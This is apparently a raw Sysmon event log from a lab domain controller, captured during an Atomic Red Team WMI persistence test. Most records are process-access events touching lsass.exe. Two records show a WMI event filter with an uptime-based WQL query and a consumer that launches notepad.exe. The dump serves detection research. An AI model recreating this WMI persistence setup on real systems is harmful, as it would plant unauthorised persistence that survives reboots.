13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.174{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.174{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.174{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.174{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.174{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 20342000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiConsumerEvent2020-12-08 13:54:44.158CreatedATTACKRANGE\Administrator "AtomicRedTeam-WMIPersistence-Example"Command Line "C:\\Windows\\System32\\notepad.exe" 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.158{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.158{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.158{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.158{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.158{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 19341900x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiFilterEvent2020-12-08 13:54:44.142CreatedATTACKRANGE\Administrator "root\\CimV2" "AtomicRedTeam-WMIPersistence-Example" "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" 10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.142{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.142{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.127{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.127{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.127{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 